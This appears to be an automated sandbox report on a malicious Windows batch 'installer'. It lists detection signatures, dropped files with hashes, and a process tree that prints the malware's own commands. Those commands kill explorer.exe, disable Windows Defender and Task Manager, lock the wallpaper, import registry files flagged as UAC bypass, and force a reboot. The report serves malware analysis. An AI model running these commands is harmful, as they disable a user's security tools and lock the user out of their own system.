Analysis

  • max time kernel
    27s
  • max time network
    33s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-03-2024 20:29

Errors

Reason
Machine shutdown

General

  • Target

    TheMalwaredev-s-garbage-main/Install Windows20/installer/main.bat

  • Size

    3KB

  • MD5

    5f54a2c61397eb3d4f1bc8e9736fec2a

  • SHA1

    5c3ad25b0bff96ad74d2743b15089847d6be2d40

  • SHA256

    9995fab89f303652abc14b153ea864d9a5e39e20c8077d165e9944948eeeb968

  • SHA512

    d7c84ac92cb35aca9fb4c2e7bb43924e5033ad49a9b4fcee320386a5d0bfddf2ec674e33a575c0848b9d274bebeb4dc9abca0360493c968bbc29c7a09438141f

Malware Config

Signatures

  • UAC bypass 3 TTPs 16 IoCs
  • Disables Task Manager via registry modification
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Windows directory 16 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 20 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\main.bat"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Windows\system32\taskkill.exe
      taskkill /f /im explorer.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4056
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\update.vbs"
      2⤵
        PID:3332
      • C:\Windows\system32\timeout.exe
        timeout 20
        2⤵
        • Delays execution with timeout.exe
        PID:1740
      • C:\Windows\system32\reg.exe
        reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Public\temp\noescape.bmp /f
        2⤵
        • Sets desktop wallpaper using registry
        PID:4776
      • C:\Windows\system32\rundll32.exe
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        2⤵
          PID:3776
        • C:\Windows\system32\reg.exe
          Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
          2⤵
            PID:468
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoTrayItemsDisplay" /t REG_DWORD /d "1" /f
            2⤵
              PID:1304
            • C:\Windows\system32\reg.exe
              reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1
              2⤵
              • Modifies registry key
              PID:2628
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoPinningToTaskbar" /t REG_DWORD /d "1" /f
              2⤵
                PID:2216
              • C:\Windows\system32\reg.exe
                reg import virus.reg
                2⤵
                  PID:776
                • C:\Windows\system32\reg.exe
                  reg import here.reg
                  2⤵
                  • UAC bypass
                  PID:1564
                • C:\Windows\system32\reg.exe
                  reg import death.reg
                  2⤵
                    PID:3876
                  • C:\Windows\system32\reg.exe
                    reg import no.reg
                    2⤵
                    • UAC bypass
                    PID:5100
                  • C:\Windows\system32\reg.exe
                    reg import password.reg
                    2⤵
                      PID:1680
                    • C:\Windows\system32\reg.exe
                      reg import color.reg
                      2⤵
                        PID:1856
                      • C:\Windows\System32\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
                        2⤵
                          PID:2568
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
                          2⤵
                            PID:2260
                          • C:\Windows\System32\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
                            2⤵
                              PID:4336
                            • C:\Windows\System32\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
                              2⤵
                                PID:752
                              • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\mover.exe
                                mover.exe
                                2⤵
                                  PID:652
                                • C:\Windows\System32\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
                                  2⤵
                                    PID:2192
                                  • C:\Windows\System32\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
                                    2⤵
                                      PID:3988
                                    • C:\Windows\System32\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
                                      2⤵
                                        PID:1248
                                      • C:\Windows\System32\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
                                        2⤵
                                          PID:2644
                                        • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
                                          x.exe
                                          2⤵
                                            PID:4068
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B2B6.tmp\x.cmd""
                                              3⤵
                                                PID:1504
                                            • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
                                              x.exe
                                              2⤵
                                                PID:4120
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B2B9.tmp\x.cmd""
                                                  3⤵
                                                    PID:4924
                                                • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
                                                  x.exe
                                                  2⤵
                                                    PID:3712
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B2C5.tmp\x.cmd""
                                                      3⤵
                                                        PID:5016
                                                    • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
                                                      x.exe
                                                      2⤵
                                                        PID:3312
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B2B7.tmp\x.cmd""
                                                          3⤵
                                                            PID:1600
                                                        • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
                                                          x.exe
                                                          2⤵
                                                            PID:2348
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B2B8.tmp\x.cmd""
                                                              3⤵
                                                                PID:3660
                                                            • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
                                                              x.exe
                                                              2⤵
                                                                PID:3168
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B2C6.tmp\x.cmd""
                                                                  3⤵
                                                                    PID:3544
                                                                • C:\Windows\system32\reg.exe
                                                                  reg import im.reg
                                                                  2⤵
                                                                    PID:4588
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg import systemmessage.reg
                                                                    2⤵
                                                                    • UAC bypass
                                                                    PID:3992
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                    2⤵
                                                                    • Modifies registry key
                                                                    PID:3584
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg import UAC.reg
                                                                    2⤵
                                                                    • UAC bypass
                                                                    PID:4132
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg import inkfile.reg
                                                                    2⤵
                                                                    • Modifies registry class
                                                                    PID:3908
                                                                  • C:\Windows\system32\shutdown.exe
                                                                    shutdown /r /t 0
                                                                    2⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:3900
                                                                • C:\Windows\system32\LogonUI.exe
                                                                  "LogonUI.exe" /flags:0x4 /state0:0xa3947855 /state1:0x41c64e6d
                                                                  1⤵
                                                                  • Modifies data under HKEY_USERS
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:3612

                                                                Network

                                                                MITRE ATT&CK Enterprise v15

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\note.txt

                                                                  Filesize

                                                                  385B

                                                                  MD5

                                                                  1ebb3ddb5424eae8205a111a3b4e2237

                                                                  SHA1

                                                                  7f6603ae0410ea2dc5adfd879632039b0eee955a

                                                                  SHA256

                                                                  efc4f3065ab66661a92daebbf770103b2e8306d3985ac5c5ae816e0f64e6ab4e

                                                                  SHA512

                                                                  cc9d3d208f97f8f9f46865ce75257cff6616e49f49b90e1273fa923c1d7c05c68e0ea35eec3361de4167839acec86e03c40cf4f1bf7bb039ec91cd4f8e3c855f

                                                                • C:\Users\Admin\AppData\Local\Temp\B2B9.tmp\x.cmd

                                                                  Filesize

                                                                  76B

                                                                  MD5

                                                                  5156c0df260ccc7bc13b73b6de4d9a25

                                                                  SHA1

                                                                  e6f8b1f6ef658a1f5772b83c898088330184d291

                                                                  SHA256

                                                                  565850ac8c04867b561958ea678143b383499e729aebace9c84bec0484772b88

                                                                  SHA512

                                                                  d2e7d791e6ccbf6389659d4fa673bbbb837a8ccbdfec287ff6a5d8a385e9aad413d692bc5cf93cae4d8292f565a7e9ddcc437da97a9b5fdd0c4526c4ca69cc39

                                                                • C:\Users\Public\Desktop\Escape.vbs

                                                                  Filesize

                                                                  23B

                                                                  MD5

                                                                  23873c064655ec26585bb489cab1965c

                                                                  SHA1

                                                                  575d47d57ddb6ffb5335f5d48f6bd222e17af599

                                                                  SHA256

                                                                  828653c66fd126cb9f30a8fc566887d3ae54376ccba637101ae8e0889a6a3b63

                                                                  SHA512

                                                                  44517e1b3e6ba403d99e3ae6d9340ea3e856a50e4bec3740d3530d066f28677b78ea2a25ebf63df948469dde04547044483bb9d37a5cf79e8b3ea3544bfaf348

                                                                • C:\Users\Public\Desktop\Hacking2.vbs

                                                                  Filesize

                                                                  182B

                                                                  MD5

                                                                  81c5f570e4fb185d0d675c450741f28b

                                                                  SHA1

                                                                  cc7c042a8ec903ea5fd4171ffa2dfe57e8a5586a

                                                                  SHA256

                                                                  0c32196e293badc8b917f22ecf9d746c631678a15704dc829d594e1e04f01376

                                                                  SHA512

                                                                  2434226097e83942ddade8a98efaa2d912f8030180729fd6ccedbe70091d262a8d1ac080ae41a6c5ac37c4303c79bbdea8d6fa86828759651536532cb2fa5936

                                                                • C:\Users\Public\Desktop\setup3.exe

                                                                  Filesize

                                                                  22KB

                                                                  MD5

                                                                  9d0cbe0006b8e6760679bf893c5d848f

                                                                  SHA1

                                                                  a85c9378a962f1f3454ec34ce596dea318031618

                                                                  SHA256

                                                                  41bb8333a815138ccdc1809c33d3263d67834b2493c6b8eeebd5dde3d1ffe20c

                                                                  SHA512

                                                                  13f513d75235da33bb032901b506c718cece2f7f9d0fbe4bd9d3508f9efca208b10a319b130ec98327b6c5e054abcf7d052ce3e672f2c1c38bac1c162d4358e2

                                                                • C:\Users\Public\Music\FREE SOLARIS.vbs

                                                                  Filesize

                                                                  37B

                                                                  MD5

                                                                  ac910281f16a464b6257102b715ffafc

                                                                  SHA1

                                                                  590add7ed48a1d5fa78093812ef88f9d0dfbb7c5

                                                                  SHA256

                                                                  afb4e7e0f799d76ec4b197427b0933935eddd933baf6379875b3c37eb6b1bc6e

                                                                  SHA512

                                                                  a62b9363acf0628ec373a33409f13e161779f0d28b0dd163b53d4ec9135b172e68c10dfb37a5459e51ec636ff3e23cc17de4a846d273e5a3e9149abe41a806ad

                                                                • C:\WinKernel64.bat

                                                                  Filesize

                                                                  113B

                                                                  MD5

                                                                  284e7e79635ec15370bb7530d20f6b7e

                                                                  SHA1

                                                                  471f6b7bc91a8c6b51f291c75126a38b082a92ce

                                                                  SHA256

                                                                  4d81298082414e092ccb0dab56007df80a1930b60315a5b759bf1d10d8c11235

                                                                  SHA512

                                                                  3bcbce046df39bf285a2e63f83374fc0c6b809b4ee5091744496244b5929753f102402c87671205ae9b7caa78b12328cabfae1523fe6abbc5abd6e66cae57e24

                                                                • C:\Windows\updatepush.exe

                                                                  Filesize

                                                                  548KB

                                                                  MD5

                                                                  c1978e4080d1ec7e2edf49d6c9710045

                                                                  SHA1

                                                                  b6a87a32d80f6edf889e99fb47518e69435321ed

                                                                  SHA256

                                                                  c9e2a7905501745c304ffc5a70b290db40088d9dc10c47a98a953267468284a8

                                                                  SHA512

                                                                  2de11fdf749dc7f4073062cdd4881cf51b78e56cb27351f463a45c934388da2cda24bf6b71670b432c9fc039e24de9edd0e2d5382b67b2681e097636ba17626e

                                                                • memory/652-56-0x0000000140000000-0x0000000140126000-memory.dmp

                                                                  Filesize

                                                                  1.1MB

                                                                • memory/652-86-0x0000000140000000-0x0000000140126000-memory.dmp

                                                                  Filesize

                                                                  1.1MB

                                                                • memory/2348-87-0x0000000000400000-0x0000000000410000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3168-92-0x0000000000400000-0x0000000000410000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3312-91-0x0000000000400000-0x0000000000410000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3712-90-0x0000000000400000-0x0000000000410000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/4068-88-0x0000000000400000-0x0000000000410000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/4120-57-0x0000000000400000-0x0000000000410000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/4120-89-0x0000000000400000-0x0000000000410000-memory.dmp

                                                                  Filesize

                                                                  64KB